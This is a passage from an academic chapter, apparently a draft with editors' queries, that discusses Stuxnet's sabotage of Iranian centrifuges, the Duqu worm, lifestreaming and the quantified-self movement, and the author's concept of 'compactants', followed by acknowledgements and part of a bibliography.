&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just reapts the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
